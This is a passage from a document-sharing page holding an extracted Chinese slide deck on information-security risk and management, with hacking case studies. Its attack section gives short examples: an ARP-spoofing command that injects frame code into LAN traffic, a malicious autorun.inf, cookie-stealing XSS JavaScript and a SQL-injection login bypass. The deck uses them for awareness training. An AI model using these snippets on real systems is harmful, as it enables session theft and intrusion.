标签: 信息   安全   风险   分析  
文档信息
上传用户 暖心女汉子     
文档格式 ppt
文档价格 2.6 元
文档大小 3M
文档页数 88 页
相关文档推荐
doc 江西版2020版一年级语文【下册】期中检测试题 (附解析).doc
doc 浙江省一级建造师《水利水电工程管理与实务》检测题B卷 附解析.doc
doc 江西版2020年一年级语文【下册】期中检测试题 (附答案).doc
doc 沪教版2019版一年级语文【下册】开学考试试题 附答案.doc
doc 浙江省一级建造师《水利水电工程管理与实务》模拟试题(II卷) 附答案.doc
doc 湖北省一级建造师《水利水电工程管理与实务》试卷C卷 含答案.doc
doc 湖南省一级建造师《水利水电工程管理与实务》模拟真题(I卷) (含答案).doc
doc 湖南省一级建造师《水利水电工程管理与实务》模拟考试D卷 附解析.doc
doc 沪教版2019-2020年一年级语文上学期期末检测试题 附答案.doc
doc 湖南省一级建造师《水利水电工程管理与实务》模拟试卷C卷 含答案.doc
doc 沪教版2019-2020年一年级语文【上册】开学检测试题 附答案.doc
doc 浙江省一级建造师《水利水电工程管理与实务》练习题A卷 (附解析).doc
doc 沪教版2019版一年级语文上学期期末检测试题 附答案.doc
doc 河南省一级建造师《水利水电工程管理与实务》练习题D卷 (含答案).doc
doc 江西版2020版一年级语文【上册】期末考试试题 含答案.doc
doc 浙江省一级建造师《水利水电工程管理与实务》真题(I卷) (附答案).doc
doc 江西版2020版一年级语文【下册】期中检测试题 附答案.doc
ppt 信息安全评估准则.ppt
doc 浙江省一级建造师《水利水电工程管理与实务》检测题A卷 含答案.doc
doc 江西版2020版一年级语文下学期期中考试试题 附答案.doc
doc 沪教版2019版一年级语文【上册】期末检测试题 (附解析).doc
doc 湖北省一级建造师《水利水电工程管理与实务》综合练习A卷 (含答案).doc
doc 沪教版2019版一年级语文【下册】期中考试试题 (附答案).doc
doc 沪教版2019版一年级语文下学期开学考试试题 (附答案).doc
doc 江西版2020版一年级语文【下册】开学考试试题 附答案.doc
ppt 信息安全管理体系标准培训.ppt
doc 沪教版2020版一年级语文上学期开学考试试题 附解析.doc
ppt 信息安全管理体系相关知识培训课件.ppt
ppt 信用卡风险管理培训.ppt
doc 湖北省一级建造师《水利水电工程管理与实务》试卷B卷 (含答案).doc
doc 江西版2019年一年级语文下学期开学考试试题 含答案.doc
ppt 信贷业务管理制度与组织体系.ppt
ppt 信息安全标准与法规.ppt
doc 河南省一级建造师《水利水电工程管理与实务》考前检测B卷 附答案.doc
doc 浙江省一级建造师《水利水电工程管理与实务》测试题D卷 (含答案).doc
doc 浙江省一级建造师《水利水电工程管理与实务》考前检测C卷 附解析.doc
doc 浙江省一级建造师《水利水电工程管理与实务》模拟试卷B卷 (附解析).doc
doc 沪教版2019版一年级语文上学期开学检测试题 含答案.doc
doc 湖南省一级建造师《水利水电工程管理与实务》检测题C卷 含答案.doc
doc 浙江省一级建造师《水利水电工程管理与实务》试题B卷 (附解析).doc
doc 河南省一级建造师《水利水电工程管理与实务》综合检测B卷 附解析.doc
ppt 信息安全管理体系.ppt
doc 江西版2019版一年级语文下学期期末考试试题 (含答案).doc
doc 浙江省一级建造师《水利水电工程管理与实务》试卷A卷 附解析.doc
doc 江西版2020版一年级语文【下册】开学考试试题 (附解析).doc
doc 湖南省一级建造师《水利水电工程管理与实务》模拟试题(II卷) (附解析).doc
doc 江西版2020年一年级语文【下册】开学检测试题 附解析.doc
doc 湖南省一级建造师《水利水电工程管理与实务》模拟试卷D卷 (附解析).doc
doc 江西版2020年一年级语文【下册】期末考试试题 附答案.doc
ppt 信息系统安全事件响应.ppt
ppt 信息安全的重要性.ppt
doc 湖北省一级建造师《水利水电工程管理与实务》模拟试卷C卷 附答案.doc
doc 沪教版2019-2020年一年级语文上学期期中检测试题 含答案.doc
doc 沪教版2019-2020年一年级语文上学期期中检测试题 (附答案).doc
ppt 信息安全等级保护制度 .ppt
doc 浙江省一级建造师《水利水电工程管理与实务》综合练习B卷 附解析.doc
doc 浙江省一级建造师《水利水电工程管理与实务》综合检测C卷 含答案.doc
doc 江西版2019版一年级语文下学期期末检测试题 附解析.doc
ppt 信息安全需求分析.ppt
doc 江西版2020版一年级语文【上册】期末检测试题 (附答案).doc
ppt 信息安全标准与法律法规.ppt
doc 湖北省一级建造师《水利水电工程管理与实务》模拟试题A卷 含答案.doc
doc 沪教版2019-2020年一年级语文【下册】开学检测试题 (附答案).doc
ppt 信息系统下的税务审查技术.ppt
ppt 信息系统安全与社会责任.ppt
doc 沪教版2019-2020年一年级语文【上册】开学检测试题 (含答案).doc
doc 沪教版2019-2020年度一年级语文【下册】期中考试试题 含答案.doc
doc 沪教版2019-2020年一年级语文上学期开学检测试题 (含答案).doc
ppt 信息系统安全等级与.ppt
doc 江西版2020年一年级语文下学期期末考试试题 (附答案).doc
ppt 信息安全管理基础课件.ppt
doc 江西版2020年一年级语文下学期期末考试试题 附解析.doc
ppt 信息安全风险评估标准化工作情况介绍.ppt
doc 江西版2020版一年级语文下学期期中考试试题 附解析.doc
doc 江西版2020版一年级语文【下册】期末检测试题 附答案.doc
doc 江西版2020年一年级语文【上册】开学检测试题 (附解析).doc
doc 湖南省一级建造师《水利水电工程管理与实务》模拟考试D卷 附答案.doc
doc 浙江省一级建造师《水利水电工程管理与实务》综合练习D卷 (附解析).doc
doc 江西版2019版一年级语文下学期期末考试试题 (附解析).doc
ppt 信息安全技术教程(全).ppt
doc 江西版2020年一年级语文【下册】开学检测试题 (含答案).doc
doc 湖南省一级建造师《水利水电工程管理与实务》检测题D卷 (含答案).doc
doc 江西版2020版一年级语文【下册】期末检测试题 (含答案).doc
doc 浙江省一级建造师《水利水电工程管理与实务》模拟考试B卷 (附答案).doc
doc 沪教版2019版一年级语文上学期期中考试试题 附解析.doc
doc 湖南省一级建造师《水利水电工程管理与实务》测试题(I卷) 含答案.doc
doc 沪教版2019版一年级语文【下册】期末考试试题 (附答案).doc
doc 沪教版2019版一年级语文上学期期末考试试题 附解析.doc
doc 浙江省一级建造师《水利水电工程管理与实务》模拟真题(II卷) (附答案).doc
doc 浙江省一级建造师《水利水电工程管理与实务》试卷A卷 附答案.doc
doc 江西版2019年一年级语文上学期期末检测试题 附解析.doc
doc 湖南省一级建造师《水利水电工程管理与实务》检测题B卷 附解析.doc
ppt 信息安全管理培训.ppt
doc 浙江省一级建造师《水利水电工程管理与实务》模拟试卷A卷 附解析.doc
doc 湖北省一级建造师《水利水电工程管理与实务》模拟真题C卷 附解析.doc
doc 江西版2020年一年级语文【上册】期末检测试题 (含答案).doc
doc 江西版2020版一年级语文下学期期中考试试题 含答案.doc
ppt 信息安全管理实践.ppt
doc 浙江省一级建造师《水利水电工程管理与实务》试题B卷 (附答案).doc
doc 湖南省一级建造师《水利水电工程管理与实务》检测题(II卷) (附解析).doc
doc 河南省一级建造师《水利水电工程管理与实务》练习题(I卷) (附解析).doc
doc 湖南省一级建造师《水利水电工程管理与实务》模拟考试(II卷) (附答案).doc
doc 浙江省一级建造师《水利水电工程管理与实务》模拟真题A卷 附答案.doc
ppt 信息安全终极解决方案.ppt
doc 沪教版2020版一年级语文【上册】期末检测试题 (附答案).doc
doc 沪教版2020年一年级语文下学期期中考试试题 含答案.doc
doc 湖南省一级建造师《水利水电工程管理与实务》模拟试卷C卷 (附答案).doc
ppt 信息安全问题的思考与对策.ppt
doc 浙江省一级建造师《水利水电工程管理与实务》综合练习(II卷) 附解析.doc
doc 浙江省一级建造师《水利水电工程管理与实务》模拟试题B卷 附答案.doc
ppt 信息系统安全与职业道德.ppt
doc 江西版2019年一年级语文上学期开学考试试题 (附解析).doc
doc 沪教版2020年一年级语文上学期期中检测试题 (附解析).doc
doc 湖北省一级建造师《水利水电工程管理与实务》试题D卷 附解析.doc
doc 沪教版2019版一年级语文下学期期末检测试题 (含答案).doc
doc 江西版2020年一年级语文下学期期末考试试题 含答案.doc
doc 江西版2020版一年级语文下学期开学检测试题 (含答案).doc
doc 江西版2020版一年级语文【上册】开学检测试题 附解析.doc
doc 沪教版2019-2020年一年级语文下学期开学考试试题 附解析.doc
doc 河南省一级建造师《水利水电工程管理与实务》练习题D卷 含答案.doc
doc 湖南省一级建造师《水利水电工程管理与实务》模拟真题(II卷) (含答案).doc
ppt 信息系统安全等级保护建设培训方案.ppt
doc 沪教版2019-2020年一年级语文上学期期中检测试题 (附解析).doc
doc 浙江省一级建造师《水利水电工程管理与实务》模拟试题A卷 (附答案).doc
ppt 信息安全等级保护与解决方案.ppt
doc 江西版2020年一年级语文上学期期中考试试题 附解析.doc
doc 江西版2020版一年级语文下学期期中考试试题 (附答案).doc
doc 浙江省一级建造师《水利水电工程管理与实务》检测题C卷 含答案.doc
doc 浙江省一级建造师《水利水电工程管理与实务》模拟考试B卷 (附解析).doc
doc 沪教版2019-2020年一年级语文【下册】开学检测试题 附解析.doc
doc 沪教版2019-2020年度一年级语文【下册】期末检测试题 (附答案).doc
doc 湖北省一级建造师《水利水电工程管理与实务》试卷B卷 (附解析).doc
doc 湖北省一级建造师《水利水电工程管理与实务》试题D卷 含答案.doc
doc 浙江省一级建造师《水利水电工程管理与实务》真题B卷 含答案.doc
doc 浙江省一级建造师《水利水电工程管理与实务》测试题(II卷) (附解析).doc
doc 湖北省一级建造师《水利水电工程管理与实务》试题A卷 附解析.doc
doc 湖南省一级建造师《水利水电工程管理与实务》模拟考试A卷 含答案.doc
ppt 信息资源与知识管理概述.ppt
doc 浙江省一级建造师《水利水电工程管理与实务》检测题(II卷) (含答案).doc
ppt 信息安全新版标准培训PPT课件.ppt
doc 浙江省一级建造师《水利水电工程管理与实务》模拟试卷A卷 (附答案).doc
doc 湖北省一级建造师《水利水电工程管理与实务》模拟真题B卷 (附答案).doc
doc 江西版2020版一年级语文下学期期中检测试题 附答案.doc
doc 江西版2020版一年级语文上学期期末检测试题 (含答案).doc
doc 浙江省一级建造师《水利水电工程管理与实务》考前检测A卷 含答案.doc
doc 湖北省一级建造师《水利水电工程管理与实务》检测题A卷 (附答案).doc
doc 湖南省一级建造师《水利水电工程管理与实务》检测题(I卷) (附解析).doc
doc 浙江省一级建造师《水利水电工程管理与实务》试卷B卷 附答案.doc
doc 沪教版2019-2020年一年级语文【下册】期末检测试题 附答案.doc
doc 湖北省一级建造师《水利水电工程管理与实务》检测题B卷 附解析.doc
doc 沪教版2019-2020年一年级语文【下册】期中检测试题 (含答案).doc
ppt 信息安全等级保护工作.ppt
doc 浙江省一级建造师《水利水电工程管理与实务》真题D卷 (含答案).doc
doc 湖南省一级建造师《水利水电工程管理与实务》模拟试题C卷 (附解析).doc
doc 沪教版2019版一年级语文【下册】期中检测试题 含答案.doc
doc 河南省一级建造师《水利水电工程管理与实务》综合练习D卷 附答案.doc
doc 浙江省一级建造师《水利水电工程管理与实务》综合检测B卷 (附答案).doc
ppt 信息系统工程监理工程师培训教程.ppt
doc 江西版2020版一年级语文【下册】期中考试试题 (附解析).doc
doc 浙江省一级建造师《水利水电工程管理与实务》模拟试题(I卷) (附答案).doc
ppt 信息安全概述-信息安全的概念.ppt
doc 浙江省一级建造师《水利水电工程管理与实务》模拟考试C卷 (含答案).doc
doc 浙江省一级建造师《水利水电工程管理与实务》练习题C卷 (附解析).doc
doc 江西版2020年一年级语文下学期开学检测试题 (附解析).doc
doc 江西版2020年一年级语文【上册】开学检测试题 附解析.doc
doc 湖南省一级建造师《水利水电工程管理与实务》模拟试题B卷 (附解析).doc
ppt 信息安全评估案例.ppt
doc 浙江省一级建造师《水利水电工程管理与实务》考前检测(II卷) 附解析.doc
doc 沪教版2019-2020年一年级语文下学期期中检测试题 附解析.doc
doc 湖南省一级建造师《水利水电工程管理与实务》模拟真题B卷 (含答案).doc
doc 江西版2019年一年级语文上学期开学检测试题 附解析.doc
doc 湖南省一级建造师《水利水电工程管理与实务》模拟试题A卷 (附解析).doc
doc 江西版2020版一年级语文【下册】期末检测试题 (附答案).doc
doc 河南省一级建造师《水利水电工程管理与实务》试题(I卷) (含答案).doc
doc 沪教版2020版一年级语文【上册】期中考试试题 含答案.doc
doc 浙江省一级建造师《水利水电工程管理与实务》测试题(I卷) 含答案.doc
doc 湖南省一级建造师《水利水电工程管理与实务》检测题D卷 (附答案).doc
doc 湖北省一级建造师《水利水电工程管理与实务》试题(II卷) 附答案.doc
ppt 信贷案例及信贷相关法律知识培训.ppt
doc 江西版2020年一年级语文【下册】开学考试试题 附答案.doc
doc 江西版2020年一年级语文【下册】开学考试试题 (含答案).doc
doc 浙江省一级建造师《水利水电工程管理与实务》真题(II卷) 附解析.doc
doc 湖北省一级建造师《水利水电工程管理与实务》模拟试卷D卷 含答案.doc
doc 江西版2020年一年级语文上学期期中考试试题 (附解析).doc
doc 沪教版2020年一年级语文下学期开学检测试题 附答案.doc
doc 沪教版2020年一年级语文下学期期末检测试题 附答案.doc
doc 江西版2020版一年级语文【上册】开学考试试题 附答案.doc
ppt 信息安全测评认证.ppt
doc 湖南省一级建造师《水利水电工程管理与实务》模拟试卷(II卷) 附解析.doc
ppt 信用评级培训教程.ppt
doc 浙江省一级建造师《水利水电工程管理与实务》模拟试卷B卷 (含答案).doc
doc 浙江省一级建造师《水利水电工程管理与实务》试卷(II卷) (附答案).doc
doc 沪教版2019版一年级语文下学期期末检测试题 附答案.doc
doc 湖北省一级建造师《水利水电工程管理与实务》考前检测(II卷) 附答案.doc
doc 江西版2020年一年级语文上学期开学检测试题 (附解析).doc
doc 湖北省一级建造师《水利水电工程管理与实务》检测题C卷 附解析.doc
doc 浙江省一级建造师《水利水电工程管理与实务》综合检测(I卷) (含答案).doc
doc 浙江省一级建造师《水利水电工程管理与实务》真题(I卷) 含答案.doc
ppt 信息安全等级保护内容介绍.ppt
doc 浙江省一级建造师《水利水电工程管理与实务》考前检测(II卷) (含答案).doc

信息安全风险及分析.ppt

 版权申诉  ppt 信息安全风险及分析,主讲:高显嵩 Email:gaoxiansong@gmail.com,个人介绍 高显嵩,工作经历: 中国“互联网信息安全与政府监管”专家组成员 中国法证技术研究组成员 北京司法局电子数据鉴定协会理事 北京广播电视大学特聘专家 原微软公司的技术支持工程师 项目背景 劳动部全国民办中介机构信用等级评定系统 劳动部全国知识竞赛评分系统 劳动部七个功能平台合并方案 北京统计局的报表打印系统 北京电大一站式平台合并的规划及实施 为考研在线提供整体安全解决方安及实施 为国家电力部内部网络设计安全解决方安及实施 鞍山移动公司网络规划 长期负责北京市安全局国家安全部内部技术培训 负责华彬大厦的整个网络规划及实施 美国百麦公司北京分公司的整个网络规划及实施,主要内容,信息安全的重要性 信息安全问题分析 信息安全管理概述 信息安全风险管理 信息安全人员管理,信息安全重要性,当前我国网络信息安全的状况,网络及计算机病毒传播泛滥 垃圾邮件和病毒邮件泛滥 黑客攻击事件频繁 用户的个人隐私及计算机的使用权受到侵犯 网络犯罪事件频繁监管力度不够 涉及版权问题的事件增多 没有统一完善的适合国情的安全标准及法规 没有职责分明的管理部门或管理小组 制约与网络基础设施和技术环境 安全体系不健全 全民安全意识及计算机网络知识薄弱,CERT有关信息安全的统计,http://www.cert.org/stats/cert_stats.html,http://www.cert.org/stats/cert_stats.html,CERT有关信息安全的统计,CERT有关信息安全的统计,http://www.cert.org/stats/cert_stats.html,网络病毒传播泛滥,据2001年调查,我国约73%的计算机用户曾感染病毒,2003年上半年升至83%。其中,感染3次以上的用户高达59%,而且病毒的破坏性较大,被病毒破坏全部数据的占14%,破坏部分数据的占57%。 对病毒的预防和发现速度相对缓慢 垃圾邮件及病毒邮件泛滥,1996年信息安全数据显示,世界上平均每20秒就有一起黑客事件发生,无论是政府机构、军事部门,还是各大银行、大公司,只要与互联网接轨,就难逃黑客的“黑手”。 据美国网络安全公司Sophos发布的报告显示,在2008年第一季度,平均每5秒钟就会有一个网页成为黑客们的“盘中餐”。 中国网民每年被网络黑客“黑”掉76亿元。,FBI计算机犯罪调查报告,2002年503家机构中,有60%受到了攻击 2002年其中223家(占503家的44%)损失的总和达到$4.55848亿 2003年530家机构中有75%(398家)在年内受到了攻击 2003年251家(占530家的47%)的经济损失总和为$2.01799734 亿,全球信息安全损失数额:,中国已成为全球黑客的第三大来源地,有关统计数据显示,目前我国95%的与因特网相联的网络管理中心都遭到过国境内外黑客的攻击或侵入,受害涉及的覆盖面越来越大、程度越来越深。据国际互联网保安公司Symantec年的报告指出,中国甚至已经成为全球黑客的第三大来源地,竟然有6.9%的攻击国际互联网活动都是由中国发出的。然而面对这种局面,我国却缺乏像西方发达国家那样健全的防范措施。,2003年黑客事件,中韩新人王网上对抗 遭黑客入侵推迟10多分钟 中韩围棋新人王对抗赛在中国的新浪网和韩国cyber网站落子,孔杰七段执白中盘战胜韩国的宋泰坤四段。赛前,由于有人以孔杰的名字入侵比赛的服务器,导致比赛推迟了10多分钟才正常进行。,2003年黑客事件,百度连续遭遇严重黑客攻击 5月15日至5月18日,中文搜索网站百度遭到中国互联网有史以来罕见黑客攻击。据百度负责技术的副总裁刘建国介绍,自5月15日22:00起,百度的检索量突然大增,此番增长并未引起工程师注意。5月16日,攻击更加强烈,每秒钟攻击次数搞到达1000次,同一个词被查询次数最多达38863次。据互联网技术专家介绍,每秒钟攻击100次就已经属于非常严重的攻击,而每秒钟1000次的攻击就实属罕见,2003年黑客事件,263游戏论坛遭黑客攻击关闭,2004年黑客事件,腾讯服务器被攻击 10月17日早上10时许,国内各地网民陆续腾讯QQ无法登陆。据腾讯QQ内部技术人员透露,一国内团体,利用腾讯QQ服务器漏洞要挟腾讯支付100万美金作为“修复”费用,腾讯QQ不予理睬后,该组织于17日正式发动攻击,腾讯QQ服务器在1个小时内大面积出现故障,不得不全面终止进行抢修.本次行动组织严谨、操作迅速,业内有部分安全管理人士称网络进入软件绑架勒索时代。,2004年黑客事件,江民网站被攻击 2004年10月17日国内著名的杀毒软件厂商江民公司的网站被一 名为河马史诗的黑客攻破,页面内容被篡改。 攻击缘由:江民公司的最新杀毒软件产品KV2005的升级导致用户在上网时无法打开“邮件监控和网页监控”,用户在江民公司的官方论坛发反映后,江民没有做出及时的回复,也没能在短时间内解决用户的问题。,2005年黑客事件频繁,也许你的计算机正在被当作从事违法犯罪活动的工具,而当这些悄悄发生的时候,你却一无所知,因为你的电脑已经成为被别人控制的“僵尸电脑”。,2005年黑客事件,国内首起僵尸网络事件 今年27岁的徐立系唐山市某企业工人,其利用某些手段在互联网上传播其编写的特定程序,先后植入4万余台计算机,形成了中国首例BOTNET“僵尸网络。 2004年10月至2005年1月,徐立操纵“僵尸网络”对北京大吕黄钟电子商务有限公司所属音乐网站北京飞行网(简称酷乐),发动多次攻击,致使该公司蒙受重大经济损失,并导致北京电信数据中心某机房网络设备大面积瘫痪。,2006年黑客事件,2006年12月31日 中国工商银行被黑 06年的最后一天,很多网友都收到一些号称“工行要倒闭,所有存款均没收”之类的新闻链接,地址都是正牌的icbc.com.cn,而不是盗版的1cbc.com.cn。原来工商被黑客入侵,截止当天晚上11点,发现此漏洞已经修改好。,07年第一黑客事件,深圳律师网被黑 当进入该网站之后,就发生事故了,发现,已经被黑. 主要有以下字样: 天空未留痕迹,鸟儿却已飞过. 网络亦是虚拟,疯狂亦是叛逆. .~~~尊敬的網站管理員 您好~~~. 台湾是中国的,日本是吃S的 .如果你是中国人. .请保留此页几天 谢谢!. 少年★浪子 所向披靡 OICQ 11888956,例子:得到本地登录密码,Pulist.exe+findpass.exe PasswordReminder.exe,例子:记录本地登录密码,GINA PassWord Sniffer,例子得到远程计算机的密码,IpcScan2.0,例子:更改本地管理员密码,WindowsNT/2000/XP/2003/Linux/Unix系统,本地接触可以更改任意用户的密码。 一张软盘更改本地管理员密码 Ntpassword 一张光盘更改本地管理员密码 ERD Commander 2003,例子:ERD Commander,例子: ERD Commander,例子:得到他人的邮件密码,密码监听器2.8,通过监听得到密码,通过监听得到密码,通过监听得到密码,例子:内网渗透 zxarps.exe,内网主机访问任意站点被入侵 指定的IP段中的用户访问的所有网站都插入一个框架代码 zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -insert ““,ARP协议工作原理,ARP欺骗交换机,ARP欺骗计算机,例子:内网U盘感染,U盘在互联网和局域网内交叉使用文件被盗取 Autorun.inf autorun风暴 [autorun] open= shell\open=打开(&O) shell\open\Command=WScript.exe .\autorun.vbs shell\open\Default=1 shell\explore=资源管理器(&X) shell\explore\Command=WScript.exe .\autorun.vbs,例子:查看网络内任何人的上网记录,any@web2.54 可以记录同一局域网内任何计算机上浏览的网页内容,察看的邮箱内容,登陆的ftp的内容。用Outlook或者Outlook Express接受的全部邮件都回同时被该软件接收。,,,例子:查看MSN密码,,例子:察看星号密码,例子:读取缓存密码,例子:控制他人计算机,Dameware 4.5 Remote Administrator2.1 是一种网络管理软件,但是经常被黑客利用来远程控制和管理,被入侵者的计算机。,,,,例子:打开对方摄像头和语音,SQL Injection 针对网站的攻击,SQL Injection 针对网站的攻击,SQL Injection 针对网站的攻击,SQL Injection 针对网站的攻击,SQL Injection 针对网站的攻击,SQL Injection 针对网站的攻击,SQL Injection 针对网站的攻击,SQL Injection 针对网站的攻击,SQL Injection 针对网站的攻击,XSS 跨站脚本,构建了个 Javascript 脚本传递客户端的 cookie 到黑客的服务器 Javascript 脚本可以简单的这样写 var img = new Image(); img.src = ‘get_cookie.php?var=’ + encodeURI(document.cookie); 然后服务器端使用 PHP 简单写了个脚本保存 Cookie 数据 ,构造SQL登陆语句,用户名: admin 密码: 1’ or ‘1’=‘1,其他例子,击键记录 Office文档挂栽木马 网页木马 木马捆绑,信息安全管理概述,,例一: 局域网内病毒泛滥成灾。 例二: 网络中为什么会有ARP欺骗的问题发生 例三: 局域网内计算机故障频繁发生 例四: 为什么要给每个用户管理员权限,先来分析两个例子,,信息安全的成败取决于两个因素:技术和管理。 技术是信息安全的构筑材料,管理是真正的粘合剂和催化剂。 人们常说,三分技术,七分管理,可见管理对信息安全的重要性。 信息安全管理(Information Security Management)作为组织完整的管理体系中一个重要的环节,它构成了信息安全具有能动性的部分,是指导和控制组织的关于信息安全风险的相互协调的活动,其针对对象就是组织的信息资产。 现实世界里大多数安全事件的发生和安全隐患的存在,与其说是技术上的原因,不如说是管理不善造成的,理解并重视管理对于信息安全的关键作用,对于真正实现信息安全目标来说尤其重要。,什么是信息安全管理?,,信息安全管理模型,,信息安全必须从整体考虑,必须做到“有计划有目标、发现问题、分析问题、采取措施解决问题、后续监督避免再现”这样全程管理的思路,这就要求建立的是一套完整的信息安全管理体系,这样的系统工程,只有处于组织最高管理者领导和支持之下,才可能成功 最高管理层通过明确信息安全目标和方针为信息安全活动指引方向 最高管理层能够为信息安全活动提供必要的资源支持 最高管理层能够在重大问题上做出决策 最高管理层可以协调组织不同单位不同环节的关系,提升促动力 说到底,最高管理者是组织信息安全的最终责任人,组织高管全面负责信息安全管理,,制定有效的安全管理计划,可以确保信息安全策略得到恰当执行 进行有效安全管理的途径,应该是自上而下的(Top-Down): 最高管理层负责启动并定义组织的安全方针 管理中层负责将安全策略充实成标准、基线、指南和程序,并监督执行 业务经理或安全专家负责实施安全管理文件中的指定配置 最终用户负责遵守组织所有的安全策略 安全管理计划小组应该开发三类计划: 战略计划(strategic plan)是长期计划(例如5年),相对稳定,定义了组织的目标和使命 战术计划(tactical plan)是中期计划(例如1年),是对实现战略计划中既定目标的任务和进度的细节描述,例如雇用计划、预算计划、维护计划、系统开发计划等 操作计划(operational plan)是短期的高度细化的计划,须经常更新(每月或每季度),例如培训计划、系统部署计划、产品设计计划等,按计划行事,,数据收集者(Data Collector)对数据主体(Data Subject):准确(Accuracy)、隐私(Privacy); 数据保管者(Data Custodian)对数据拥有者(Data Owner):可用性(Availability)、完整性(Integrity)、保密性(Confidentiality); 数据用户(Data Users)对拥有者/主体(Owner/Subject):保密性(Confidentiality)和完整性; 系统用户(System Users)对系统拥有者(System Owner):可用性(Availability)和软件完整性(Software Integrity); 系统管理者(System Manager)对用户(Users),可用性(Integrity)、完整性(Integrity); 用户(Users)对其它用户(Other Users):可用性(Availability)。,重要角色和职责,信息安全管风险管理,风险,风险管理(Risk Management)就是识别风险、评估风险、采取措施将风险减少到可接受水平,并维持这个风险水平的过程。风险管理是信息安全管理的核心内容。,在信息安全领域,风险(Risk)就是指信息资产遭受损坏并给企业带来负面影响的潜在可能性。,风险管理,风险管理概述,资产(Asset)—— 对组织具有价值的信息资产,包括计算机硬件、通信设施、数据库、文档信息、软件、信息服务和人员等,所有这些资产都需要妥善保护。 威胁(Threat)—— 可能对资产或组织造成损害的某种安全事件发生的潜在原因,需要识别出威胁源(Threat source)或威胁代理(Threat agent)。 弱点(Vulnerability)—— 也被称作漏洞或脆弱性,即资产或资产组中存在的可被威胁利用的缺点,弱点一旦被利用,就可能对资产造成损害。 风险(Risk)—— 特定威胁利用资产弱点给资产或资产组带来损害的潜在可能性。 可能








































 版权投诉/申诉   非法内容举报    本页不提供全部页面预览,未展示部分请购买并下载后观看使用